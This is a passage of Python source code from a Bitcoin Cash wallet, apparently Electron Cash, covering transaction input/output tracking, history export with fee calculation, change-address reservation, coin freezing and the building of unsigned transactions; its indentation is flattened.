def find_in_self_txo(prevout_hash: str, prevout_n: int) -> tuple:
"""Returns a tuple of the (Address,value) for a given
prevout_hash:prevout_n, or (None, None) if not found. If valid
return, the Address object is found by scanning self.txo. The
lookup below is relatively fast in practice even on pathological
wallets."""
dd = self.txo.get(prevout_hash, {})
for addr2, item in dd.items():
for n, v, is_cb in item:
if n == prevout_n:
return addr2, v
return (None, None)
def txin_get_info(txi):
prevout_hash = txi['prevout_hash']
prevout_n = txi['prevout_n']
ser = f'{prevout_hash}:{prevout_n}'
return prevout_hash, prevout_n, ser
def put_pruned_txo(ser, tx_hash):
self.pruned_txo[ser] = tx_hash
self.pruned_txo_values.add(tx_hash)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put(ser)
def pop_pruned_txo(ser):
next_tx = self.pruned_txo.pop(ser, None)
if next_tx:
self.pruned_txo_values.discard(next_tx)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put('r_' + ser) # notify of removal
return next_tx
# /HELPER FUNCTIONS
# add inputs
self.txi[tx_hash] = d = {}
for txi in tx.inputs():
if txi['type'] == 'coinbase':
continue
addr = txi.get('address')
# find value from prev output
if self.is_mine(addr):
prevout_hash, prevout_n, ser = txin_get_info(txi)
dd = self.txo.get(prevout_hash, {})
for n, v, is_cb in dd.get(addr, []):
if n == prevout_n:
add_to_self_txi(tx_hash, addr, ser, v)
break
else:
# Coin's spend tx came in before its receive tx: flag
# the spend for when the receive tx will arrive into
# this function later.
put_pruned_txo(ser, tx_hash)
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
del dd, prevout_hash, prevout_n, ser
elif addr is None:
# Unknown/unparsed address.. may be a strange p2sh scriptSig
# Try and find it in txout's if it's one of ours.
# See issue #895.
prevout_hash, prevout_n, ser = txin_get_info(txi)
# Find address in self.txo for this prevout_hash:prevout_n
addr2, v = find_in_self_txo(prevout_hash, prevout_n)
if addr2 is not None and self.is_mine(addr2):
add_to_self_txi(tx_hash, addr2, ser, v)
self._addr_bal_cache.pop(addr2, None) # invalidate cache entry
else:
# Not found in self.txo. It may still be one of ours
# however since tx's can come in out of order due to
# CTOR, etc, and self.txo may not have it yet. So we
# flag the spend now, and when the out-of-order prevout
# tx comes in later for this input (if it's indeed one
# of ours), the real address for this input will get
# picked up then in the "add outputs" section below in
# this function. At that point, self.txi will be
# properly updated to indicate the coin in question was
# spent via an add_to_self_txi call.
#
# If it's *not* one of ours, however, the below will
# grow pruned_txo with an irrelevant entry. However, the
# irrelevant entry will eventually be reaped and removed
# by the self.pruned_txo_cleaner_thread which runs
# periodically in the background.
put_pruned_txo(ser, tx_hash)
del addr2, v, prevout_hash, prevout_n, ser
# don't keep empty entries in self.txi
if not d:
self.txi.pop(tx_hash, None)
# add outputs
self.txo[tx_hash] = d = {}
op_return_ct = 0
deferred_cashacct_add = None
for n, txo in enumerate(tx.outputs()):
ser = tx_hash + ':%d'%n
_type, addr, v = txo
mine = False
if isinstance(addr, ScriptOutput):
if addr.is_opreturn():
op_return_ct += 1
if isinstance(addr, cashacct.ScriptOutput):
# auto-detect CashAccount registrations we see,
# and notify cashacct subsystem of that fact. But we
# can only do it after making sure it's the *only*
# OP_RETURN in the tx.
deferred_cashacct_add = (
lambda _tx_hash=tx_hash, _tx=tx, _n=n, _addr=addr:
self.cashacct.add_transaction_hook(_tx_hash, _tx, _n, _addr)
)
elif self.is_mine(addr):
# add coin to self.txo since it's mine.
mine = True
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((n, v, is_coinbase))
del l
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
# give v to txi that spends me
next_tx = pop_pruned_txo(ser)
if next_tx is not None and mine:
add_to_self_txi(next_tx, addr, ser, v)
# don't keep empty entries in self.txo
if not d:
self.txo.pop(tx_hash, None)
# save
self.transactions[tx_hash] = tx
# Invoke the cashacct add hook (if defined) here at the end, with
# the lock held. We accept the cashacct.ScriptOutput only iff
# op_return_ct == 1 as per the Cash Accounts spec.
# See: https://gitlab.com/cash-accounts/lookup-server/blob/master/routes/parser.js#L253
if op_return_ct == 1 and deferred_cashacct_add:
deferred_cashacct_add()
# Unconditionally invoke the SLP handler. Note that it is a fast &
# cheap no-op if this tx's outputs[0] is not an SLP script.
self.slp.add_tx(tx_hash, tx)
def remove_transaction(self, tx_hash):
with self.lock:
self.print_error("removing tx from history", tx_hash)
# Note that we don't actually remove the tx_hash from
# self.transactions, but instead rely on the unreferenced tx being
# removed the next time the wallet is loaded in self.load_transactions()
for ser, hh in list(self.pruned_txo.items()):
if hh == tx_hash:
self.pruned_txo.pop(ser)
self.pruned_txo_values.discard(hh)
# add tx to pruned_txo, and undo the txi addition
for next_tx, dd in self.txi.items():
for addr, l in list(dd.items()):
ll = l[:]
for item in ll:
ser, v = item
prev_hash, prev_n = ser.split(':')
if prev_hash == tx_hash:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
l.remove(item)
self.pruned_txo[ser] = next_tx
self.pruned_txo_values.add(next_tx)
if l == []:
dd.pop(addr)
else:
dd[addr] = l
# invalidate addr_bal_cache for outputs involving this tx
d = self.txo.get(tx_hash, {})
for addr in d:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
try: self.txi.pop(tx_hash)
except KeyError: self.print_error("tx was not in input history", tx_hash)
try: self.txo.pop(tx_hash)
except KeyError: self.print_error("tx was not in output history", tx_hash)
# do this with the lock held
self.cashacct.remove_transaction_hook(tx_hash)
# inform slp subsystem as well
self.slp.rm_tx(tx_hash)
def receive_tx_callback(self, tx_hash, tx, tx_height):
self.add_transaction(tx_hash, tx)
self.add_unverified_tx(tx_hash, tx_height)
if self.network and self.network.callback_listener_count("payment_received") > 0:
for _, addr, _ in tx.outputs():
status = self.get_request_status(addr) # returns PR_UNKNOWN quickly if addr has no requests, otherwise returns tuple
if status != PR_UNKNOWN:
status = status[0] # unpack status from tuple
self.network.trigger_callback('payment_received', self, addr, status)
def receive_history_callback(self, addr, hist, tx_fees):
with self.lock:
old_hist = self.get_address_history(addr)
for tx_hash, height in old_hist:
if (tx_hash, height) not in hist:
s = self.tx_addr_hist.get(tx_hash)
if s:
s.discard(addr)
if not s:
# if no address references this tx anymore, kill it
# from txi/txo dicts.
if s is not None:
# We won't keep empty sets around.
self.tx_addr_hist.pop(tx_hash)
# note this call doesn't actually remove the tx from
# storage, it merely removes it from the self.txi
# and self.txo dicts
self.remove_transaction(tx_hash)
self._addr_bal_cache.pop(addr, None) # unconditionally invalidate cache entry
self._history[addr] = hist
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# add reference in tx_addr_hist
self.tx_addr_hist[tx_hash].add(addr)
# if addr is new, we have to recompute txi and txo
tx = self.transactions.get(tx_hash)
if tx is not None and self.txi.get(tx_hash, {}).get(addr) is None and self.txo.get(tx_hash, {}).get(addr) is None:
self.add_transaction(tx_hash, tx)
# Store fees
self.tx_fees.update(tx_fees)
if self.network:
self.network.trigger_callback('on_history', self)
def add_tx_to_history(self, txid):
with self.lock:
for addr in itertools.chain(list(self.txi.get(txid, {}).keys()), list(self.txo.get(txid, {}).keys())):
cur_hist = self._history.get(addr, list())
if not any(True for x in cur_hist if x[0] == txid):
cur_hist.append((txid, 0))
self._history[addr] = cur_hist
TxHistory = namedtuple("TxHistory", "tx_hash, height, conf, timestamp, amount, balance")
def get_history(self, domain=None, *, reverse=False):
# get domain
if domain is None:
domain = self.get_addresses()
# 1. Get the history of each address in the domain, maintain the
# delta of a tx as the sum of its deltas on domain addresses
tx_deltas = defaultdict(int)
for addr in domain:
h = self.get_address_history(addr)
for tx_hash, height in h:
delta = self.get_tx_delta(tx_hash, addr)
if delta is None or tx_deltas[tx_hash] is None:
tx_deltas[tx_hash] = None
else:
tx_deltas[tx_hash] += delta
# 2. create sorted history
history = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
history.sort(key = lambda x: self.get_txpos(x[0]), reverse=True)
# 3. add balance
c, u, x = self.get_balance(domain)
balance = c + u + x
h2 = []
for tx_hash, height, conf, timestamp, delta in history:
h2.append(self.TxHistory(tx_hash, height, conf, timestamp, delta, balance))
if balance is None or delta is None:
balance = None
else:
balance -= delta
if not reverse:
h2.reverse()
return h2
def export_history(self, domain=None, from_timestamp=None, to_timestamp=None, fx=None,
show_addresses=False, decimal_point=8,
*, fee_calc_timeout=10.0, download_inputs=False,
progress_callback=None):
''' Export history. Used by RPC & GUI.
Arg notes:
- `fee_calc_timeout` is used when computing the fee (which is done
asynchronously in another thread) to limit the total amount of time in
seconds spent waiting for fee calculation. The timeout is a total time
allotment for this function call. (The reason the fee calc can take a
long time is for some pathological tx's, it is very slow to calculate
fee as it involves deserializing prevout_tx from the wallet, for each
input).
- `download_inputs`, if True, will allow for more accurate fee data to
be exported with the history by using the Transaction class input
fetcher to download *all* prevout_hash tx's for inputs (even for
inputs not in wallet). This feature requires self.network (ie, we need
to be online) otherwise it will behave as if download_inputs=False.
- `progress_callback`, if specified, is a callback which receives a
single float argument in the range [0.0,1.0] indicating how far along
the history export is going. This is intended for interop with GUI
code. Node the progress callback is not guaranteed to be called in the
context of the main thread, therefore GUI code should use appropriate
signals/slots to update the GUI with progress info.
Note on side effects: This function may update self.tx_fees. Rationale:
it will spend some time trying very hard to calculate accurate fees by
examining prevout_tx's (leveraging the fetch_input_data code in the
Transaction class). As such, it is worthwhile to cache the results in
self.tx_fees, which gets saved to wallet storage. This is not very
demanding on storage as even for very large wallets with huge histories,
tx_fees does not use more than a few hundred kb of space. '''
from .util import timestamp_to_datetime
# we save copies of tx's we deserialize to this temp dict because we do
# *not* want to deserialize tx's in wallet.transactoins since that
# wastes memory
local_tx_cache = {}
# some helpers for this function
t0 = time.time()
def time_remaining(): return max(fee_calc_timeout - (time.time()-t0), 0)
class MissingTx(RuntimeError):
''' Can happen in rare circumstances if wallet history is being
radically reorged by network thread while we are in this code. '''
def get_tx(tx_hash):
''' Try to get a tx from wallet, then from the Transaction class
cache if that fails. In either case it deserializes the copy and
puts the deserialized tx in local stack dict local_tx_cache. The
reason we don't deserialize the tx's from self.transactions is that
we do not want to keep deserialized tx's in memory. The
self.transactions dict should contain just raw tx's (not
deserialized). Deserialized tx's eat on the order of 10x the memory
because because of the Python lists, dict, etc they contain, per
instance. '''
tx = local_tx_cache.get(tx_hash)
if tx:
return tx
tx = Transaction.tx_cache_get(tx_hash)
if not tx:
tx = copy.deepcopy(self.transactions.get(tx_hash))
if tx:
tx.deserialize()
local_tx_cache[tx_hash] = tx
else:
raise MissingTx(f'txid {tx_hash} dropped out of wallet history while exporting')
return tx
def try_calc_fee(tx_hash):
''' Try to calc fee from cheapest to most expensive calculation.
Ultimately asks the transaction class to look at prevouts in wallet and uses
that scheme as a last (more CPU intensive) resort. '''
fee = self.tx_fees.get(tx_hash)
if fee is not None:
return fee
def do_get_fee(tx_hash):
tx = get_tx(tx_hash)
def try_get_fee(tx):
try: return tx.get_fee()
except InputValueMissing: pass
fee = try_get_fee(tx)
t_remain = time_remaining()
if fee is None and t_remain:
q = queue.Queue()
def done():
q.put(1)
tx.fetch_input_data(self, use_network=bool(download_inputs), done_callback=done)
try: q.get(timeout=t_remain)
except queue.Empty: pass
fee = try_get_fee(tx)
return fee
fee = do_get_fee(tx_hash)
if fee is not None:
self.tx_fees[tx_hash] = fee # save fee to wallet if we bothered to dl/calculate it.
return fee
def fmt_amt(v, is_diff):
if v is None:
return '--'
return format_satoshis(v, decimal_point=decimal_point,
is_diff=is_diff)
# grab history
h = self.get_history(domain, reverse=True)
out = []
n, l = 0, max(1, float(len(h)))
for tx_hash, height, conf, timestamp, value, balance in h:
if progress_callback:
progress_callback(n/l)
n += 1
timestamp_safe = timestamp
if timestamp is None:
timestamp_safe = time.time() # set it to "now" so below code doesn't explode.
if from_timestamp and timestamp_safe < from_timestamp:
continue
if to_timestamp and timestamp_safe >= to_timestamp:
continue
try:
fee = try_calc_fee(tx_hash)
except MissingTx as e:
self.print_error(str(e))
continue
item = {
'txid' : tx_hash,
'height' : height,
'confirmations' : conf,
'timestamp' : timestamp_safe,
'value' : fmt_amt(value, is_diff=True),
'fee' : fmt_amt(fee, is_diff=False),
'balance' : fmt_amt(balance, is_diff=False),
}
if item['height'] > 0:
date_str = format_time(timestamp) if timestamp is not None else _("unverified")
else:
date_str = _("unconfirmed")
item['date'] = date_str
try:
# Defensive programming.. sanitize label.
# The below ensures strings are utf8-encodable. We do this
# as a paranoia measure.
item['label'] = self.get_label(tx_hash).encode(encoding='utf-8', errors='replace').decode(encoding='utf-8', errors='replace')
except UnicodeError:
self.print_error(f"Warning: could not export label for {tx_hash}, defaulting to ???")
item['label'] = "???"
if show_addresses:
tx = get_tx(tx_hash)
input_addresses = []
output_addresses = []
for x in tx.inputs():
if x['type'] == 'coinbase': continue
addr = x.get('address')
if addr == None: continue
input_addresses.append(addr.to_ui_string())
for _type, addr, v in tx.outputs():
output_addresses.append(addr.to_ui_string())
item['input_addresses'] = input_addresses
item['output_addresses'] = output_addresses
if fx is not None:
date = timestamp_to_datetime(timestamp_safe)
item['fiat_value'] = fx.historical_value_str(value, date)
item['fiat_balance'] = fx.historical_value_str(balance, date)
item['fiat_fee'] = fx.historical_value_str(fee, date)
out.append(item)
if progress_callback:
progress_callback(1.0) # indicate done, just in case client code expects a 1.0 in order to detect completion
return out
def get_label(self, tx_hash):
label = self.labels.get(tx_hash, '')
if not label:
label = self.get_default_label(tx_hash)
return label
def get_default_label(self, tx_hash):
if not self.txi.get(tx_hash):
d = self.txo.get(tx_hash, {})
labels = []
for addr in list(d.keys()): # use a copy to avoid possibility of dict changing during iteration, see #1328
label = self.labels.get(addr.to_storage_string())
if label:
labels.append(label)
return ', '.join(labels)
return ''
def get_tx_status(self, tx_hash, height, conf, timestamp):
if conf == 0:
tx = self.transactions.get(tx_hash)
if not tx:
return 3, 'unknown'
fee = self.tx_fees.get(tx_hash)
# we disable fee estimates in BCH for now.
#if fee and self.network and self.network.config.has_fee_estimates():
# size = len(tx.raw)/2
# low_fee = int(self.network.config.dynfee(0)*size/1000)
# is_lowfee = fee < low_fee * 0.5
#else:
# is_lowfee = False
# and instead if it's less than 1.0 sats/B we flag it as low_fee
try:
# NB len(tx.raw) is 2x the byte size as it's hex encoded.
is_lowfee = int(fee) / (int(len(tx.raw)) / 2.0) < 1.0 # if less than 1.0 sats/B, complain. otherwise don't.
except (TypeError, ValueError): # If for some reason fee was None or invalid, just pass on through.
is_lowfee = False
# /
if height < 0:
status = 0
elif height == 0 and is_lowfee:
status = 1
elif height == 0:
status = 2
else:
status = 3
else:
status = 3 + min(conf, 6)
time_str = format_time(timestamp) if timestamp else _("unknown")
status_str = _(TX_STATUS[status]) if status < 4 else time_str
return status, status_str
def relayfee(self):
return relayfee(self.network)
def dust_threshold(self):
return dust_threshold(self.network)
def reserve_change_addresses(self, count, temporary=False):
""" Reserve and return `count` change addresses. In order
of preference, this will return from:
1. addresses 'freed' by `.unreserve_change_address`,
2. addresses in the last 20 (gap limit) of the change list,
3. newly-created addresses.
Of these, only unlabeled, unreserved addresses with no usage history
will be returned. If you pass temporary=False (default), this will
persist upon wallet saving, otherwise with temporary=True the address
will be made available again once the wallet is re-opened.
On non-deterministic wallets, this returns an empty list.
"""
if count <= 0 or not hasattr(self, 'create_new_address'):
return []
with self.lock:
last_change_addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if not last_change_addrs:
# this happens in non-deterministic wallets but the above
# hasattr check should have caught those.
return []
def gen_change():
try:
while True:
yield self.change_unreserved.pop(0)
except IndexError:
pass
for addr in last_change_addrs:
yield addr
while True:
yield self.create_new_address(for_change=True)
result = []
for addr in gen_change():
if ( addr in self.change_reserved
or addr in self.change_reserved_tmp
or self.get_num_tx(addr) != 0
or addr in result):
continue
addr_str = addr.to_storage_string()
if self.labels.get(addr_str):
continue
result.append(addr)
if temporary:
self.change_reserved_tmp.add(addr)
else:
self.change_reserved.add(addr)
if len(result) >= count:
return result
raise RuntimeError("Unable to generate new addresses") # should not happen
def unreserve_change_address(self, addr):
""" Unreserve an addr that was set by reserve_change_addresses, and
also explicitly reschedule this address to be usable by a future
reservation. Unreserving is appropriate when the address was never
actually shared or used in a transaction, and reduces empty gaps in
the change list.
"""
assert addr in self.get_change_addresses()
with self.lock:
self.change_reserved.discard(addr)
self.change_reserved_tmp.discard(addr)
self.change_unreserved.append(addr)
def get_default_change_addresses(self, count):
""" Return `count` change addresses from the default reserved list,
ignoring and removing used addresses. Reserves more as needed.
The same default change addresses keep getting repeated until they are
actually seen as used in a transaction from the network. Theoretically
this could hurt privacy if the user has multiple unsigned transactions
open at the same time, but practically this avoids address gaps for
normal usage. If you need non-repeated addresses, see
`reserve_change_addresses`.
On non-deterministic wallets, this returns an empty list.
"""
result = []
with self.lock:
for addr in list(self.change_reserved_default):
if len(result) >= count:
break
if self.get_num_tx(addr) != 0:
self.change_reserved_default.remove(addr)
continue
result.append(addr)
need_more = count - len(result)
if need_more > 0:
new_addrs = self.reserve_change_addresses(need_more)
self.change_reserved_default.extend(new_addrs)
result.extend(new_addrs)
return result
def make_unsigned_transaction(self, inputs, outputs, config, fixed_fee=None, change_addr=None, sign_schnorr=None):
''' sign_schnorr flag controls whether to mark the tx as signing with
schnorr or not. Specify either a bool, or set the flag to 'None' to use
whatever the wallet is configured to use from the GUI '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
# check outputs
i_max = None
for i, o in enumerate(outputs):
_type, data, value = o
if value == '!':
if i_max is not None:
raise BaseException("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise BaseException('Dynamic fee estimates not available')
for item in inputs:
self.add_input_info(item)
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
else:
fee_estimator = lambda size: fixed_fee
if i_max is None:
# Let the coin chooser select the coins to spend
change_addrs = []
if change_addr:
change_addrs = [change_addr]
else:
# Currently the only code that uses this hook is the deprecated
# Cash Shuffle plugin
change_addrs = run_hook("get_change_addrs", self) or []
if not change_addrs:
# hook gave us nothing, so find a change addr from the change
# reservation subsystem
max_change = self.max_change_outputs if self.multiple_change else 1
if self.use_change:
change_addrs = self.get_default_change_addresses(max_change)
else:
change_addrs = []
if not change_addrs:
# For some reason we couldn't get any autogenerated change
# address (non-deterministic wallet?). So, try to find an
# input address that belongs to us.
for inp in inputs:
backup_addr = inp['address']
if self.is_mine(backup_addr):
change_addrs = [backup_addr]
break
else:
# ok, none of the inputs are "mine" (why?!) -- fall back
# to picking first max_change change_addresses that have
# no history
change_addrs = []
for addr in self.get_change_addresses()[-self.gap_limit_for_change:]:
if self.get_num_tx(addr) == 0:
change_addrs.append(addr)
if len(change_addrs) >= max_change:
break
if not change_addrs:
# No unused wallet addresses or no change addresses.
# Fall back to picking ANY wallet address
try:
# Pick a random address
change_addrs = [random.choice(self.get_addresses())]
except IndexError:
change_addrs = [] # Address-free wallet?!
# This should never happen
if not change_addrs:
raise RuntimeError("Can't find a change address!")
assert all(isinstance(addr, Address) for addr in change_addrs)
coin_chooser = coinchooser.CoinChooserPrivacy()
tx = coin_chooser.make_tx(inputs, outputs, change_addrs,
fee_estimator, self.dust_threshold(), sign_schnorr=sign_schnorr)
else:
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = fee_estimator(tx.estimated_size())
amount = max(0, sendable - tx.output_value() - fee)
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
# If user tries to send too big of a fee (more than 50 sat/byte), stop them from shooting themselves in the foot
tx_in_bytes=tx.estimated_size()
fee_in_satoshis=tx.get_fee()
sats_per_byte=fee_in_satoshis/tx_in_bytes
if (sats_per_byte > 50):
raise ExcessiveFee()
# Sort the inputs and outputs deterministically
tx.BIP_LI01_sort()
# Timelock tx to current height.
locktime = self.get_local_height()
if locktime == -1: # We have no local height data (no headers synced).
locktime = 0
tx.locktime = locktime
run_hook('make_unsigned_transaction', self, tx)
return tx
def mktx(self, outputs, password, config, fee=None, change_addr=None, domain=None, sign_schnorr=None):
coins = self.get_spendable_coins(domain, config)
tx = self.make_unsigned_transaction(coins, outputs, config, fee, change_addr, sign_schnorr=sign_schnorr)
self.sign_transaction(tx, password)
return tx
def is_frozen(self, addr):
""" Address-level frozen query. Note: this is set/unset independent of
'coin' level freezing. """
assert isinstance(addr, Address)
return addr in self.frozen_addresses
def is_frozen_coin(self, utxo: Union[str, dict, Set[str]]) -> Union[bool, Set[str]]:
""" 'coin' level frozen query. Note: this is set/unset independent of
address-level freezing.
`utxo` is a prevout:n string, or a dict as returned from get_utxos(),
in which case a bool is returned.
`utxo` may also be a set of prevout:n strings in which case a set is
returned which is the intersection of the internal frozen coin sets
and the `utxo` set. """
assert isinstance(utxo, (str, dict, set))
if isinstance(utxo, dict):
name = ("{}:{}".format(utxo['prevout_hash'], utxo['prevout_n']))
ret = name in self.frozen_coins or name in self.frozen_coins_tmp
if ret != utxo['is_frozen_coin']:
self.print_error("*** WARNING: utxo has stale is_frozen_coin flag", name)
utxo['is_frozen_coin'] = ret # update stale flag
return ret
elif isinstance(utxo, set):
# set is returned
return (self.frozen_coins | self.frozen_coins_tmp) & utxo
else:
return utxo in self.frozen_coins or utxo in self.frozen_coins_tmp
def set_frozen_state(self, addrs, freeze):
"""Set frozen state of the addresses to `freeze`, True or False. Note
that address-level freezing is set/unset independent of coin-level
freezing, however both must be satisfied for a coin to be defined as
spendable."""
if all(self.is_mine(addr) for addr in addrs):
if freeze:
self.frozen_addresses |= set(addrs)
else:
self.frozen_addresses -= set(addrs)
frozen_addresses = [addr.to_storage_string()
for addr in self.frozen_addresses]
self.storage.put('frozen_addresses', frozen_addresses)
return True
return False
def set_frozen_coin_state(self, utxos, freeze, *, temporary=False):
"""Set frozen state of the `utxos` to `freeze`, True or False. `utxos`
is a (possibly mixed) list of either "prevout:n" strings and/or
coin-dicts as returned from get_utxos(). Note that if passing prevout:n
strings as input, 'is_mine()' status is not checked for the specified
coin. Also note that coin-level freezing is set/unset independent of
address-level freezing, however both must be satisfied for a coin to be
defined as spendable.
The `temporary` flag only applies if `freeze = True`. In that case,
freezing coins will only affect the in-memory-only frozen set, which
doesn't get saved to storage. This mechanism was added so that plugins
(such as CashFusion) have a mechanism for ephemeral coin freezing that
doesn't persist across sessions.
Note that setting `freeze = False` effectively unfreezes both the
temporary and the permanent frozen coin sets all in 1 call. Thus after a
call to `set_frozen_coin_state(utxos, False), both the temporary and the
persistent frozen sets are cleared of all coins in `utxos`."""
add_set = self.frozen_coins if not temporary else self.frozen_coins_tmp
def add(utxo):
add_set.add(utxo)
def discard(utxo):
self.frozen_coins.discard(utxo)
self.frozen_coins_tmp.discard(utxo)
apply_operation = add if freeze else discard
original_size = len(self.frozen_coins)
with self.lock:
ok = 0
for utxo in utxos:
if isinstance(utxo, str):
apply_operation(utxo)
ok += 1
elif isinstance(utxo, dict):
# Note: we could do an is_mine check here for each coin dict here,
# but since all code paths leading to this branch always pass valid
# coins that are "mine", we removed the check to save CPU cycles.
#
# So an O(M logN) algorithm becomes O(M) without the is_mine check,
# where M = number of coins and N = number of addresses.
txo = "{}:{}".format(utxo['prevout_hash'], utxo['prevout_n'])
apply_operation(txo)
utxo['is_frozen_coin'] = bool(freeze)
ok += 1
if original_size != len(self.frozen_coins):
# Performance optimization: only set storage if the perma-set
# changed.
self.storage.put('frozen_coins', list(self.frozen_coins))
return ok
def prepare_for_verifier(self):
# review transactions that are in the history
for addr, hist in self._history.items():
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# if we are on a pruning server, remove unverified transactions
with self.lock:
vr = list(self.verified_tx.keys()) + list(self.unverified_tx.keys())
for tx_hash in list(self.transactions):
if tx_hash not in vr:
self.print_error("removing transaction", tx_hash)
self.transactions.pop(tx_hash)
def start_threads(self, network):
self.network = network
if self.network:
self.start_pruned_txo_cleaner_thread()
self.prepare_for_verifier()
self.verifier = SPV(self.network, self)
self.synchronizer = Synchronizer(self, network)
finalization_print_error(self.verifier)
finalization_print_error(self.synchronizer)
network.add_jobs([self.verifier, self.synchronizer])
self.cashacct.start(self.network) # start cashacct network-dependent subsystem, nework.add_jobs, etc
else:
self.verifier = None
self.synchronizer = None
def stop_threads(self):
if self.network:
# Note: syncrhonizer and verifier will remove themselves from the
# network thread the next time they run, as a result of the below
# release() calls.
# It is done this way (as opposed to an immediate clean-up here)
# because these objects need to do thier clean-up actions in a
# thread-safe fashion from within the thread where they normally
# operate on their data structures.
self.cashacct.stop()
self.synchronizer.release()
self.verifier.release()
self.synchronizer = None
self.verifier = None
self.stop_pruned_txo_cleaner_thread()
# Now no references to the syncronizer or verifier
# remain so they will be GC-ed
self.storage.put('stored_height', self.get_local_height())
self.save_network_state()
def save_network_state(self):
"""Save all the objects which are updated by the network thread. This is called
periodically by the Android app during long synchronizations.
"""
with self.lock:
self.save_addresses()
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.put('frozen_coins', list(self.frozen_coins))
self.save_change_reservations()
self.storage.write()
def start_pruned_txo_cleaner_thread(self):
self.pruned_txo_cleaner_thread = threading.Thread(target=self._clean_pruned_txo_thread, daemon=True, name='clean_pruned_txo_thread')
self.pruned_txo_cleaner_thread.q = queue.Queue()
self.pruned_txo_cleaner_thread.start()
def stop_pruned_txo_cleaner_thread(self):
t = self.pruned_txo_cleaner_thread
self.pruned_txo_cleaner_thread = None # this also signals a stop
if t and t.is_alive():
t.q.put(None) # signal stop
# if the join times out, it's ok. it means the thread was stuck in
# a network call and it will eventually exit.
t.join(timeout=3.0)
def wait_until_synchronized(self, callback=None, *, timeout=None):
tstart = time.time()
def check_timed_out():
if timeout is not None and time.time() - tstart > timeout:
raise TimeoutException()
def wait_for_wallet():
self.set_up_to_date(False)
while not self.is_up_to_date():
if callback:
msg = "%s\n%s %d"%(
_("Please wait..."),
_("Addresses generated:"),
len(self.addresses(True)))
callback(msg)
time.sleep(0.1)
check_timed_out()
def wait_for_network():
while not self.network.is_connected():
if callback:
msg = "%s \n" % (_("Connecting..."))
callback(msg)
time.sleep(0.1)
check_timed_out()
# wait until we are connected, because the user
# might have selected another server
if self.network:
wait_for_network()
wait_for_wallet()
else:
self.synchronize()
def can_export(self):
return not self.is_watching_only() and hasattr(self.keystore, 'get_private_key')
def is_used(self, address):
return self.get_address_history(address) and self.is_empty(address)
def is_empty(self, address):
assert isinstance(address, Address)
return not any(self.get_addr_balance(address))
def address_is_old(self, address, age_limit=2):
age = -1
local_height = self.get_local_height()
for tx_hash, tx_height in self.get_address_history(address):
if tx_height == 0:
tx_age = 0
else:
tx_age = local_height - tx_height + 1
if tx_age > age:
age = tx_age
if age > age_limit:
break # ok, it's old. not need to keep looping
return age > age_limit
def add_input_info(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
# Bitcoin Cash needs value to sign
received, spent = self.get_addr_io(address)
item = received.get(txin['prevout_hash']+':%d'%txin['prevout_n'])
tx_height, value, is_cb = item
txin['value'] = value
self.add_input_sig_info(txin, address)
def can_sign(self, tx):
if tx.is_complete():
return False
for k in self.get_keystores():
# setup "wallet advice" so Xpub wallets know how to sign 'fd' type tx inputs
# by giving them the sequence number ahead of time
if isinstance(k, BIP32_KeyStore):
for txin in tx.inputs():
for x_pubkey in txin['x_pubkeys']:
_, addr = xpubkey_to_address(x_pubkey)
try:
c, index = self.get_address_index(addr)
except:
continue
if index is not None:
k.set_wallet_advice(addr, [c,index])
if k.can_sign(tx):
return True
return False
def get_input_tx(self, tx_hash):
# First look up an input transaction in the wallet where it
# will likely be. If co-signing a transaction it may not have
# all the input txs, in which case we ask the network.
tx = self.transactions.get(tx_hash)
if not tx and self.network:
request = ('blockchain.transaction.get', [tx_hash])
tx = Transaction(self.network.synchronous_get(request))
return tx
def add_input_values_to_tx(self, tx):
""" add input values to the tx, for signing"""
for txin in tx.inputs():
if 'value' not in txin:
inputtx = self.get_input_tx(txin['prevout_hash'])
if inputtx is not None:
out_zero, out_addr, out_val = inputtx.outputs()[txin['prevout_n']]
txin['value'] = out_val
txin['prev_tx'] = inputtx # may be needed by hardware wallets
def add_hw_info(self, tx):
# add previous tx for hw wallets, if needed and not already there
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx) and k.needs_prevtx()) for k in self.get_keystores()]):
for txin in tx.inputs():
if 'prev_tx' not in txin:
txin['prev_tx'] = self.get_input_tx(txin['prevout_hash'])
# add output info for hw wallets
info = {}
xpubs = self.get_master_public_keys()
for txout in tx.outputs():
_type, addr, amount = txout
if self.is_change(addr):
index = self.get_address_index(addr)
pubkeys = self.get_public_keys(addr)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
info[addr] = index, sorted_xpubs, self.m if isinstance(self, Multisig_Wallet) else None, self.txin_type
tx.output_info = info
def sign_transaction(self, tx, password, *, use_cache=False):
""" Sign a transaction, requires password (may be None for password-less
wallets). If `use_cache` is enabled then signing will be much faster.
For transactions with N inputs and M outputs, calculating all sighashes
takes only O(N + M) with the cache, as opposed to O(N^2 + NM) without
the cache.
Warning: If you modify non-signature parts of the transaction
afterwards, do not use `use_cache`! """
if self.is_watching_only():
return
# add input values for signing
self.add_input_values_to_tx(tx)
# hardware wallets require extra info
